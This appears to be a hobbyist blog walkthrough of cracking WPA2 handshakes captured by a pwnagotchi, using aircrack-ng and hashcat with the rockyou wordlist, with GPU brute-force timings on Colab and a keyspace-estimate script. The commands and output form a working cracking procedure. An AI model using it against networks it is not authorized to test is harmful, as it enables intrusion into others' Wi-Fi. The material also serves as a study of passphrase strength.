
Analyzing pwnagotchi handshakes

Last updated at Posted at 2020-05-07

History

2021/08/14 hashcat -m 2500 has been retired. Use hashcat -m 22000 instead.
2021/06/18 The Google Colaboratory free tier no longer lets me use it.

Analyzing the pcap files

How to build a pwnagotchi is described here ( https://qiita.com/k0uj1k/items/f91a3b7e3a4b9209774f )

Copy the pcap files of the handshakes that pwnagotchi captured over to Kali Linux.
Then check them against a dictionary.

Downloading the dictionary

# git clone https://github.com/kennyn510/wpa2-wordlists.git

Importing from pwnagotchi

This walkthrough analyzes damedame_xxxxxxxxxxxxxx.pcap.
Make the handshakes directory accessible from Kali Linux.
From here:

# scp -pr pi@10.0.0.2:/home/pi/handshakes ~
# cp ~/handshakes/damedame_xxxxxxxxxxxxxx.pcap ~/work
# cd work

The rest of the work is done in the work directory.


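Analysis with aircrack-ng

The ESSID is required as an argument. In most cases the part of the file name before the _ is the ESSID, but if the ESSID contains characters such as -, it can differ from the file name, so confirm it with tshark.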

# tshark -r damedame_xxxxxxxxxxxxxx.pcap
(omitted)
    4  -0.016541 ABCDEFG_aa:aa:aa → Apple_00:00:00 802.11 209 Probe Response, SN=2282, FN=0, Flags=........C, BI=100, SSID=damedame
(omitted)

This confirms SSID=damedame.

aircrack-ng

Run the analysis with the downloaded dictionary.
Note: for this example I used a reduced dictionary containing only the entries that start with "P".

# aircrack-ng damedame_xxxxxxxxxxxxxx.pcap -w wpa2-wordlists/Wordlists/Rockyou/P.txt -e damedame

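The display switches to the analysis screen (full screen).

Analysis screen

The candidates from the dictionary are checked one after another.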


                               Aircrack-ng 1.6 

      [00:00:16] 53586/536377 keys tested (3401.86 k/s) 

      Time left: 2 minutes, 21 seconds                           9.99%

                          KEY FOUND! [ password123 ]


      Master Key     : 6C DC 28 E5 EE D6 0D D3 24 8D 42 A9 94 FA 40 DA 
                       8F C6 7B 3B BB 4E F2 32 84 48 E7 D5 47 3A A4 E7 

      Transient Key  : D8 8F 19 22 3B 86 AD B3 25 E7 E4 93 BA 54 9D A4 
                       95 0E D5 5F 6F 8B 09 BE 26 D0 91 F5 47 90 3F 11 
                       9A AB 21 45 F3 EC 45 F4 0C 19 02 13 7C DB 8E 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : CB A5 D7 88 A6 CF 36 71 CB 53 F6 EB CC 8C BE CC 



Oops, it was found.

It took about two and a half minutes.


Analysis with hashcat

Use hashcat-utils to convert the pcap file to an hccapx file.

Building hashcat-utils

# git clone https://github.com/hashcat/hashcat-utils

# cd hashcat-utils
# cd src
# make
# cd ../..

Converting the pcap file

Upload the pcap file to the online converter, convert it, and then download the result.

You get a file with the hc22000 extension, such as zzzzzz.hc22000.

hashcat -m22000

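Here too, run the analysis with the downloaded dictionary. The log below was captured with hashcat v5.1.0 and still shows KERN_TYPE=2500 and the .hccapx file name.
Note: for this example I used a reduced dictionary containing only the entries that start with "P".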

# hashcat --force -m 22000 damedame_xxxxxxxxxxxxxx.hccapx wpa2-wordlists/Wordlists/Rockyou/P.txt 
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz, 1024/2955 MB allocatable, 2MCU

Hashes: 7 digests; 6 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Salt
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=2500 -D _unroll'
Dictionary cache built:
* Filename..: wpa2-wordlists/Wordlists/Rockyou/P.txt
* Passwords.: 536377
* Bytes.....: 5367337
* Keyspace..: 536377
* Runtime...: 0 secs

346f71dc3e3a2693d747d437217829e5:yyyyyyyyyyyy:xxxxxxxxxxxx:damedame:password123
17d763d85546808a1a77ac2228c1c3c7:yyyyyyyyyyyy:xxxxxxxxxxxx:damedame:password123
41e2bb5f70b2ca7ae6b25832342b06c6:yyyyyyyyyyyy:xxxxxxxxxxxx:damedame:password123
04173eeb81c18a45d16816d063ec0479:yyyyyyyyyyyy:xxxxxxxxxxxx:damedame:password123
b4fe69e2cfcc15df3caffe4b6adc3a2a:yyyyyyyyyyyy:zzzzzzzzzzzz:damedame:password123
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => 

It was found again.

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-EAPOL-PBKDF2
Hash.Target......: damedame_xxxxxxxxxxxxxx.hccapx
Time.Started.....: Wed May  6 20:27:58 2020 (26 secs)
Time.Estimated...: Wed May  6 20:30:03 2020 (1 min, 39 secs)
Guess.Base.......: File (wpa2-wordlists/Wordlists/Rockyou/P.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     3807 H/s (6.84ms) @ Accel:512 Loops:128 Thr:1 Vec:8
Recovered........: 5/6 (83.33%) Digests, 0/1 (0.00%) Salts
Progress.........: 157123/536377 (29.29%)
Rejected.........: 58819/157123 (37.44%)
Restore.Point....: 156773/536377 (29.23%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:3712-3840
Candidates.#1....: putol_003 -> putalamierda5673

About a minute and a half, then.

hashcat can also run the analysis without a dictionary, but according to
https://hashcat.net/hashcat/


GPU Driver requirements:
+ AMD GPUs on Linux require "RadeonOpenCompute (ROCm)" Software Platform (1.6.180 or later)
+ AMD GPUs on Windows require "AMD Radeon Software Crimson Edition" (15.12 or later)
+ Intel CPUs require "OpenCL Runtime for Intel Core and Intel Xeon Processors" (16.1.1 or later)
+ Intel GPUs on Linux require "OpenCL 2.0 GPU Driver Package for Linux" (2.0 or later)
+ Intel GPUs on Windows require "OpenCL Driver for Intel Iris and Intel HD Graphics"
+ NVIDIA GPUs require "NVIDIA Driver" (367.x or later)
a GPU driver is required.
Without one, it takes an enormous amount of time.

Session..........: hashcat
Status...........: Quit
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: damedame_xxxxxxxxxxxxxx.hccapx
Time.Started.....: Wed Jun  3 15:16:52 2020 (3 mins, 39 secs)
Time.Estimated...: Next Big Bang (9196 years, 212 days)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?d?d?d?d [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     7196 H/s (393.18ms) @ Accel:16 Loops:1024 Thr:1024 Vec:1
Recovered........: 0/94 (0.00%) Digests
Progress.........: 1572864/2088270645760000 (0.00%)
Rejected.........: 0/1572864 (0.00%)
Restore.Point....: 49152/80318101760000 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:18-19 Iteration:0-94
Candidates.#1....: wtfwnane1234 -> wwvgonan1234

It would take 9,200 years.

I would like to run a GPU at full tilt.

Google Colaboratory

I wanted to run a GPU at full tilt for free, so I tried Google Colaboratory.

hashcat (v6.0.0-33-g75d801e1) starting...

* Device #1: This hardware has outdated CUDA compute capability (3.7).
             For modern OpenCL performance, upgrade to hardware that supports
             CUDA compute capability version 5.0 (Maxwell) or higher.
* Device #2: This hardware has outdated CUDA compute capability (3.7).
             For modern OpenCL performance, upgrade to hardware that supports
             CUDA compute capability version 5.0 (Maxwell) or higher.
nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 10.1)
====================
* Device #1: Tesla K80, 11373/11441 MB, 13MCU

OpenCL API (OpenCL 1.2 CUDA 10.1.152) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: Tesla K80, skipped

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Hashes: 7 digests; 6 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers applied:
* Zero-Byte
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 292 MB

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: damedame_xxxxxxxxxxxx.hccapx
Time.Started.....: Fri Jul 10 09:05:02 2020 (20 secs)
Time.Estimated...: Wed Jun 25 18:01:21 2769 (748 years, 350 days)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?d?d?d?d [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    88356 H/s (73.13ms) @ Accel:32 Loops:64 Thr:1024 Vec:1
Recovered........: 0/6 (0.00%) Digests
Progress.........: 1703936/2088270645760000 (0.00%)
Rejected.........: 0/1703936 (0.00%)
Restore.Point....: 0/80318101760000 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:4-5 Iteration:832-896
Candidates.#1....: aarierin1234 -> aqmbxxxx1234
Hardware.Mon.#1..: Temp: 50c Util:100% Core: 823MHz Mem:2505MHz Bus:16

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => 

Even with a Tesla K80, 2860/11441 MB allocatable, 13MCU, it takes 750 years!

hashcat (v6.0.0-34-g57776832) starting...

nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 10.1)
====================
* Device #1: Tesla T4, 14969/15079 MB, 40MCU

OpenCL API (OpenCL 1.2 CUDA 10.1.152) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: Tesla T4, skipped

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Hashes: 7 digests; 6 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers applied:
* Zero-Byte
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 766 MB

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s


Session..........: hashcat
Status...........: Running
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: damedame_xxxxxxxxxxxx.hccapx
Time.Started.....: Fri Jul 10 12:51:07 2020 (26 secs)
Time.Estimated...: Mon Dec 21 14:26:15 2212 (192 years, 163 days)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?d?d?d?d [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   343.9 kH/s (58.81ms) @ Accel:8 Loops:256 Thr:1024 Vec:1
Recovered........: 0/6 (0.00%) Digests
Progress.........: 8847360/2088270645760000 (0.00%)
Rejected.........: 0/8847360 (0.00%)
Restore.Point....: 327680/80318101760000 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:1-2 Iteration:512-768
Candidates.#1....: mefjyone1234 -> midgkine1234
Hardware.Mon.#1..: Temp: 62c Util:100% Core:1200MHz Mem:5000MHz Bus:16

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

I happened to be assigned a Tesla T4, 14969/15079 MB, 40MCU, but even that takes 193 years!

hashcat (v6.0.0-34-g57776832) starting...

nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 10.1)
====================
* Device #1: Tesla P100-PCIE-16GB, 16017/16280 MB, 56MCU

OpenCL API (OpenCL 1.2 CUDA 10.1.152) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: Tesla P100-PCIE-16GB, skipped

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Hashes: 7 digests; 6 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers applied:
* Zero-Byte
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1047 MB

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s


Session..........: hashcat
Status...........: Running
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: damedame_xxxxxxxxxxxx.hccapx
Time.Started.....: Sat Jul 11 12:11:10 2020 (25 secs)
Time.Estimated...: Fri Apr  1 19:23:00 2163 (142 years, 264 days)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?d?d?d?d [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   463.7 kH/s (60.73ms) @ Accel:16 Loops:128 Thr:1024 Vec:1
Recovered........: 0/6 (0.00%) Digests
Progress.........: 11010048/2088270645760000 (0.00%)
Rejected.........: 0/11010048 (0.00%)
Restore.Point....: 0/80318101760000 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:12-13 Iteration:2176-2304
Candidates.#1....: harierin1234 -> hwhieyon1234
Hardware.Mon.#1..: Temp: 49c Util:100% Core:1328MHz Mem: 715MHz Bus:16

With a Tesla P100-PCIE-16GB, 16017/16280 MB, 56MCU, it takes 143 years.
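
The "Time.Estimated" figures in the status outputs above are the mask keyspace divided by the hash rate, which is why a passphrase outside any dictionary holds up for centuries while a dictionary word falls in minutes. The following Python sketch is an added example, not part of the original article: the function names are my own, and the mask, speeds and dictionary size are the values shown in the logs on this page.

```python
from math import prod

# Sizes of hashcat's built-in mask charsets (?l ?u ?d ?h ?H ?s ?a ?b).
CHARSET_SIZES = {"l": 26, "u": 26, "d": 10, "h": 16, "H": 16,
                 "s": 33, "a": 95, "b": 256}
SECONDS_PER_YEAR = 365 * 24 * 3600
WPA_MIN_LEN, WPA_MAX_LEN = 8, 63  # limits reported by hashcat in the logs above


def mask_positions(mask):
    """Return the number of candidate characters at each mask position."""
    sizes, i = [], 0
    while i < len(mask):
        if mask[i] != "?":
            sizes.append(1)            # literal character
            i += 1
            continue
        token = mask[i + 1:i + 2]
        if token == "?":
            sizes.append(1)            # "??" is a literal question mark
        elif token in CHARSET_SIZES:
            sizes.append(CHARSET_SIZES[token])
        else:                          # custom charsets (?1..?4) are not handled
            raise ValueError(f"unsupported mask token {mask[i:i + 2]!r}")
        i += 2
    if not WPA_MIN_LEN <= len(sizes) <= WPA_MAX_LEN:
        raise ValueError("WPA passphrases are 8 to 63 characters long")
    return sizes


def keyspace(mask):
    """Total number of candidates the mask generates."""
    return prod(mask_positions(mask))


def years_to_exhaust(mask, hashes_per_second):
    """Worst-case time to try every candidate of the mask, in years."""
    return keyspace(mask) / hashes_per_second / SECONDS_PER_YEAR


# Speed.#1 values copied from the status outputs on this page (H/s).
PAGE_SPEEDS = {"no GPU driver": 7196, "Tesla K80": 88_356,
               "Tesla T4": 343_900, "Tesla P100": 463_700}
PAGE_MASK = "?l?l?l?l?l?l?l?l?d?d?d?d"

if __name__ == "__main__":
    print(f"keyspace of {PAGE_MASK}: {keyspace(PAGE_MASK):,}")
    for device, speed in PAGE_SPEEDS.items():
        print(f"{device:14s} {years_to_exhaust(PAGE_MASK, speed):8.0f} years")
    # Contrast: the 536377-entry dictionary at the 3807 H/s CPU rate from the page.
    print(f"dictionary run: about {536377 / 3807:.0f} seconds")
```

The computed keyspace equals the total in hashcat's Progress line, and the year counts land within a few years of hashcat's own estimates because the measured speed fluctuates during a run.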


Hack the planet!
